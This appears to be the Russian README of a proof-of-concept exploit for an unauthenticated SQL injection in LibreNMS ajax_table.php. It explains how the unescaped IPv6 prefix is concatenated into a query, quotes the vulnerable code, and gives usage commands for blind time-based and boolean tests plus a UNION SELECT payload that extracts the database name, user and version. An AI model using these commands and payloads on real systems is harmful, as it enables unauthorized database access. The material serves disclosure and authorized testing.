
Proof-of-concept эксплойт для неаутентифицированной SQL-инъекции в LibreNMS ajax_table.php, демонстрирующий техники слепой инъекции на основе времени и булевых значений для авторизованного тестирования безопасности.
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:NПараметр address при search_type=ipv6 разделяется по / на адрес и префикс.
Префикс напрямую конкатенируется в SQL-запрос без экранирования:
$sql .= " AND ipv6_prefixlen = '$prefix'";
Одинарная кавычка (') в части префикса позволяет выйти из строкового литерала → произвольная SQL-инъекция.
flowchart TD
A[Attacker] -->|1. HTTP POST to /ajax_table.php| B[LibreNMS Web Server]
B -->|2. id=address-search & search_type=ipv6| C[Parse address parameter]
C -->|3. Split on '/' → $address / $prefix| D[Build vulnerable SQL]
D -->|4. Concatenate: ipv6_prefixlen = '$prefix'| E[MySQL / MariaDB]
E -->|5. Execute injected query| F[Return results / error / delay]
F -->|6. Attacker observes response / timing| A
subgraph "Injection Point"
D
end
style D fill:#ff4d4d,stroke:#333,stroke-width:2px,color:#fff
requests (pip install requests)python3 exploit.py http://target/librenms --test
python3 exploit.py http://192.168.1.50/librenms --time
→ Если ответ занимает >5–6 секунд → уязвим
python3 exploit.py http://target/librenms --boolean
python3 exploit.py http://target/librenms --test --payload "64' UNION SELECT database(),user(),version() -- "
exploit.py .............. Основной PoC-скрипт (при необходимости переименуйте из cve-2026-26988-poc.py)README.md ............... Этот файл15429580baba... → PR #18777Данный proof-of-concept предоставлен исключительно в образовательных целях и для авторизованного тестирования безопасности.
НЕ используйте этот код против любой системы или сети без явного письменного разрешения владельца.
Несанкционированное использование может нарушать законы, включая (но не ограничиваясь) Computer Fraud and Abuse Act (CFAA) в США или аналогичное законодательство вашей страны.
Используйте на свой страх и риск.
Автор: Mohammed Idrees Banyamer
Instagram: @banyamer_security
Дата: 20 февраля 2026